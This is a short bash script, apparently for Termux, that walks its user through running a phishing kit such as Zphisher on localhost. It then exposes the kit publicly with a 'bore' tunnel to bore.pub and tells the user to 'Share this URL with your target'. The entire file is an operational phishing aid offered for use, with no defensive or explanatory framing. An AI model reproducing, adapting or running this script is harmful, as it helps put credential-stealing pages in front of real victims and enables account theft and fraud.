#!/bin/bash
echo "========================================="
echo "       BORE TUNNEL - Public URL"
echo "========================================="
echo ""
echo "Before starting bore:"
echo "1. Open a NEW Termux window (swipe from left → New session)"
echo "2. In that window, start your phishing tool (Zphisher, etc.)"
echo "3. When it asks for IP, choose 'Localhost' or '127.0.0.1'"
echo "4. Come back to THIS window and press Enter"
echo ""
read -p "Press Enter to start bore tunnel..."
echo ""
echo "Starting bore tunnel..."
echo "Your public URL will be: bore.pub:XXXXX"
echo "Share this URL with your target"
echo "Press Ctrl+C to stop"
echo ""
bore local 8080 --to bore.pub
